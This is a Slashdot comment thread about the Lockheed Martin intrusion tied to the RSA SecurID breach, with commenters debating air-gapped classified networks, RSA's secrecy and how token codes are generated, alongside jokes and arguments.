    4. Re:Hey, maybe we can finally ask by lennier1 · · Score: 1

      Depends on whether they served chili in the officers mess.

    5. Re:Hey, maybe we can finally ask by Briareos · · Score: 1

      African or European?

      np: Decimal - The Lesson Of Hope (Soma Coma 5)

      --

      "I'm not anti-anything, I'm anti-everything, it fits better." - Sole

  10. PC Magzine: Classified data secure. Wrong. by Relayman · · Score: 2

    According to PC Magazine: "Classified information is likely out of hackers' hands: Due to the volume of attacks that these kinds of systems on a daily basis, it's highly doubtful that Lockheed—or any security contractor—would keep top-secret information within reach, should one ever breach the remote access gates."

    Sounds like wishful thinking to me. Classified information has been breached in the past so why would you expect that it's magically safe now?

    --
    If I used a sig over again, would anyone notice?
    1. Re:PC Magzine: Classified data secure. Wrong. by Anonymous Coward · · Score: 0

      According to PC Magazine: "Classified information is likely out of hackers' hands: Due to the volume of attacks that these kinds of systems on a daily basis, it's highly doubtful that Lockheed—or any security contractor—would keep top-secret information within reach, should one ever breach the remote access gates."

      Sounds like wishful thinking to me. Classified information has been breached in the past so why would you expect that it's magically safe now?

      Sounds like ignorance on your part to me.

    2. Re:PC Magzine: Classified data secure. Wrong. by Anonymous Coward · · Score: 0

      I would imagine they keep a separate network, not connected to the internet, for stuff no one is supposed to get at. Otherwise stuff would be leaking everywhere and defense software would be developed much more cheaply.

    3. Re:PC Magzine: Classified data secure. Wrong. by tsotha · · Score: 1

      Classified information has been breached in the past so why would you expect that it's magically safe now?

      Oh? Classified information has been stolen by hacking in from the internet? When?

    4. Re:PC Magzine: Classified data secure. Wrong. by Anonymous Coward · · Score: 0

      According to PC Magazine: "Classified information is likely out of hackers' hands: Due to the volume of attacks that these kinds of systems on a daily basis, it's highly doubtful that Lockheed—or any security contractor—would keep top-secret information within reach, should one ever breach the remote access gates." Sounds like wishful thinking to me. Classified information has been breached in the past so why would you expect that it's magically safe now?

      I know someone who works for Lockheed Martin, and they have said that their RSA token allows them offsite access to at least some classified material.

    5. Re:PC Magzine: Classified data secure. Wrong. by Anonymous Coward · · Score: 0

      Classified networks are not connected to unclassified networks.
      When classified networks are breached, it is by an insider with physical access to classified machines, or by a physical intrusion.

    6. Re:PC Magzine: Classified data secure. Wrong. by Anonymous Coward · · Score: 0

      I work for a company that does top secret government work. Classified systems are not allowed to be on an internet connected network, There is an air gap that must be breached by sneaker net. So while you might get all sorts of great intel and IP on the corporate LAN, you simply can't get to the systems where classified work is done. Someone would have to make a human error and put the information in the wrong place. That kind of thing does occasionally happen but the screw ups are fringe classified stuff (linking pieces of info that shouldn't be linked) and not the real good stuff like to plans to some device. When classified information is put in the wrong place, everything is wiped, backups confiscated, and everyone involved gets a lovely grilling.

    7. Re:PC Magzine: Classified data secure. Wrong. by Relayman · · Score: 1

      The requisite Wikipedia article states that the successful attack on Google by the Chinese indicates that they have stolen classified information from defense contractors. However, that is more like speculation than hard evidence.

      With Google search, most breaches are done by bypassing the Internet, either by using a USB flash drive or by stealing hard disks.

      I may have exaggerated, but after reading The Cuckoo's Egg, where attacks on the military network were run through security defense contractor Mitre Corporation, I remain skeptical that classified data is immune from Internet attack. How were the Chinese able to develop the J-20 stealth fighter without stealing U.S. classified data?

      --
      If I used a sig over again, would anyone notice?
    8. Re:PC Magzine: Classified data secure. Wrong. by tsotha · · Score: 2

      Oh, don't get me wrong. I think classified data is routinely stolen by other countries. I just don't think much (if any) is stolen by cyberspies hacking in from the outside. When I worked as a defense contractor the rules were pretty strict - we had a network with classified data on it, but that network was physically disconnected from the internet. The cables were even covered in thick pipes that were regularly inspected to discourage tapping from the inside.

      I'm not saying nobody has ever stolen classified data by hacking in. But for that to happen someone has to physically put classified data on an insecure network, something that's not easy to do on accident.

    9. Re:PC Magzine: Classified data secure. Wrong. by Anonymous Coward · · Score: 0

      According to PC Magazine: "Classified information is likely out of hackers' hands: Due to the volume of attacks that these kinds of systems on a daily basis, it's highly doubtful that Lockheed—or any security contractor—would keep top-secret information within reach, should one ever breach the remote access gates."

      Sounds like wishful thinking to me. Classified information has been breached in the past so why would you expect that it's magically safe now?

      Probably because a hacker would need to get through additional layers of security to access whatever system the classified information is on. If the information is really that sensitive, there is probably an auditing system in place to keep track of who accesses the data and when.

      Unless the hackers found someone who has completely ignored all of his or her anti-social engineering training classes (or if they have someone on the inside), it is completely plausable that they didn't get much farther than Lockeed intranet website.

    10. Re:PC Magzine: Classified data secure. Wrong. by smash · · Score: 1

      How were the Chinese able to develop the J-20 stealth fighter without stealing U.S. classified data?

      perhaps by, you know, research. Stealth has been around since the 80s or earlier - hitler had a rudimentary stealth flying wing design in ww2. China has a few billion people - if even 1% of them are gifted, that is a he'll of a lot of scientific brain power.

      --
      I run: Windows, OS X, Linux, FreeBSD. Just because you have a hammer, doesn't mean everything is a nail.
  11. RSA putting publicity ahead of security? by Anonymous Coward · · Score: 0

    RSA has kept details of the SecurId attack secret. In particular, they won't even say what was taken.

    Of course, the attackers know exactly what was taken, because they are holding and exploiting the material.

    So the only people in the dark are the bystanders and-- perhaps most importantly-- potential customers.

    Sadly, RSA's secrecy around the incident looks to be a public relations move to conceal the severity of the attack.

  12. How does it generate the string of numbers? by Anonymous Coward · · Score: 0

    These security tokens have always fascinated me. I use Google two-step auth with my phone with the same type of technology. Does anyone know what variables might go in to producing the digits? I imagine possibly the time, MAC address of the phone, and/or some other identifiers.

    1. Re:How does it generate the string of numbers? by vajrabum · · Score: 1

      I'm not sure how the Google stuff works. The SecurID tag is simple a clock wired up to a random number generator. It has a seed that is secret that is shared with the Authentication server (ACE server). As long as the clocks are sync'd then the token/tag will show the same number as generated on the server. Each SecurID token has that seed and also a serial number. Based on some stuff I heard recently through the grapevine, I'd guess that somebody has figured out how to map from the SecurID serial number to the key seed. If the system is properly designed this isn't any such mapping but fatal shortcomings in cryptographic software are nothing new. If you have SecurID in your enterprise then you probably want to grab your salesguy by the throat and tell him they need to fix this *now* at RSA's expense. This may well be the worst IT security breach of the 21st century so far.

  13. Slasddot Memo #2334212123 by Anonymous Coward · · Score: 0

    Dear Reuters:

    Expect a visit from some friendly people.

    Yours In Krasnoyarsk,
    Kilgore T.

  14. really? by sjudd · · Score: 1

    there are military or high security environments still using RSA?

    --
    All women want is honesty, if you can fake that, you're in.
  15. Oh noes! by DamienNightbane · · Score: 0

    Looks like Anonymous is planning on building an air force.

  16. We could do it the german way by acidfast7 · · Score: 1

    I think we need new English words to represent these concepts more concisely: an adjective for "not authorized to speak publicly on the matter", and a verb for "confirmed under condition of anonymity".

    verb: confirmedunderconditionofanonymiten adjective: unauthorizedtospeaktothepubliconmatterse

  17. We have perfectly good words for these already by petes_PoV · · Score: 1

    The first one is "unreliable" and the second is "rumoured". As in "an unreliable source is rumoured to have said .... "

    --
    politicians are like babies' nappies: they should both be changed regularly and for the same reasons
    1. Re:We have perfectly good words for these already by Haeleth · · Score: 1

      Oh, I was going to go with "a traitor leaked ..."

      Much shorter and to the point.

  18. Soft tokens? by Technomancer · · Score: 2

    I they are using soft token apps in addition to hardware keys they are trivial to duplicate if you can get ahold of the key string and password from an employee.

  19. Comment removed by account_deleted · · Score: 3, Interesting

    Comment removed based on user account deletion

  20. RSA's lost data by Anonymous Coward · · Score: 0

    If you have it, observe 2 or maybe 3 or 4 authentications of a given token, I suspect you can impersonate that token at will.

    You will still need the PIN and username and possibly password, but you get those when you snoop the authentications.

    And lastly, you'll need a giant bucket of CPU to calculate all the tokens for each point in time you see an RSA key's authentication.

  21. Lockheed Martin and the UK Census by Uhyve · · Score: 1

    Aren't they the guys who did the UK census? I wonder if they'll offer every UK citizen Identity Protection. Even though I'm from the UK and hence was forced to participate in the census, I'd almost feel good about that information getting stolen, this is what us whiny people were going on about.

  22. Tempest, top secret vs secret etc by Anonymous Coward · · Score: 0

    I have to agree. Back when I was working at a large computer company doing DoD work, all the stuff classified Secret that was on-line was in a non-networked room. You had to sign in and out. You could not bring any disks/tape/usb drives and the like in there. You had to show your IDs etc. Every Secret item was signed in and out, logged and work-product burned. They were perfectly willing to look at everything you took in or out. The room itself was designed in accordance with tempest procedures to avoid any emissions - so there was definitely no external access. IIRC even the floor was elevated as compared to the other parts of the building, presumably to make sure there was nothing coming in through the floor when needed. And it was all internal walls. I have a hard time believing that any DoD Contractors would be going *backwards* in those respects.

    And that was just the *Secret* stuff. The Top Secret was even worse in terms of paper handling, controls, logging, safe access, and paper trails than the merely Secret paper and that continued through the TS vs S world into the computer side. The "burn bag" alone wasn't enough. The security people on both were really on top of making sure that procedures were followed.

    Admittedly it has been over 10 years, but I can't believe it would have gone backwards in terms of security. Some things are so basic that it seems unbelievable they'd be changed - but hey, we see it all the time, so who knows.

  23. Re:Hey, maybe we can finally ask .... TR3B by Anonymous Coward · · Score: 0

    I didn't know that a 1962 Triumph was faster than the SR-71B

  24. So you're against whistleblowers? by apparently · · Score: 1
    What exactly is your problem with people revealing information that organizations would rather keep hidden?

    Yes, I'm not a moron

    And what exactly is your evidence that you're not a moron?

    1. Re:So you're against whistleblowers? by dbraden · · Score: 1

      What exactly is your problem with people revealing information that organizations would rather keep hidden?

      Not all information should be "free", nor do you have a right to know everything. An organization, or an individual, wanting to keep something secret is not, in and of itself, evil.

    2. Re:So you're against whistleblowers? by apparently · · Score: 1

      Not all information should be "free", nor do you have a right to know everything. An organization, or an individual, wanting to keep something secret is not, in and of itself, evil.

      When did I say that all information should be free? Care to quote me?
      When did I say that I have a right to know everything? Care to quote me?
      When did I say that an organization or an individual wanting to keep something secret is in and of itself evil? Care to quote me?

      That's quite a lot of inferring you did there, and none of it's remotely accurate. Excellent job, champ.

      But please tell me how it's beneficial for people not to know rhat Lockheed was broken into through an RSA vulnerability? Please tell me how it's beneficial to current users of RSA's product to know the extent to which they are at risk. I encourage you to answer both questions directly in lieu of making half-assed inferences.

  25. not to mention by dlt074 · · Score: 1

    nothing classified will even be on the compromised networks. classified(US government) material is not placed on networks connected to networks connected to the internet... if so, they have worse problems then bad PR and compromised boxes. you do not want the US government up your ass for spilling classified data.

  26. Should have by zero0ne · · Score: 1

    thought about getting Enterprise protection.

  27. Surprise Intrusion? by BoRegardless · · Score: 1

    How come I no longer respect big government and corporations to adequately protect themselves and us as a country anymore? It couldn't be because a major security blunder is reported in the press about once a week is it?

    How can any large public corporation & defense contractors not have teams of people to constantly audit & oversee security procedures, penetration testing, network analysis, and systems analysis to keep up to date on a daily threat basis?

    These constant adverse events inspire dark cynicism in an otherwise positive person.

    Logical answers? If you can't keep the bad guys out, for god's sake get them offline permanently.

    1. Re:Surprise Intrusion? by sloth+jr · · Score: 2

      A few aspects of security as practiced in the military-industrial complex occur that you may be unaware of:
      - daily automated audits; these regularly flag new vulnerabilities;
      - entire teams dedicated to evaluation of controls and failure therein
      - segmentation of computing resources by sensitivity; if it's really sensitive, it's not on any network you can get to.
      - physical barriers (gates, armed guards, man traps)

      There are literally thousands of pages of controls concerning security just for non-classified resources: http://iase.disa.mil/stigs/
      They all depend on the integrity of the persons entrusted to safeguard this data. Intentional violation of those controls as allegedly practiced by PFC Bradley Manning show how these safeguards can break down. Ultimately, you need humans to be able to keep a secret if you have the notion of "classified". That's the real security mechanism right there. That's why security clearances are designed to identify whether or not an individual is "loyal" and not likely to be coerced into revealing state secrets. In any human endeavor, though - some human will conspire to fuck it up. The end-result is almost always massive and persistent headache for everyone else.

  28. Why is it connected to web? by Anonymous Coward · · Score: 0

    Martin shouldn't connect to the intr0nets.
    TSAgent provocateur thug accessing an NSA fios splitter steal keys
    fuck the forth amendment

  29. govt sickness by Anonymous Coward · · Score: 0

    Healing begins by admitting the sickness

  30. Dilbert by snookiex · · Score: 1

    A very convenient comic strip

    --
    Open Source Network Inventory for the masses! Kuwaiba
  31. expect china by johncandale · · Score: 1

    Expect China to develop yet another military technology stolen from the US in the next 24 months, mark my words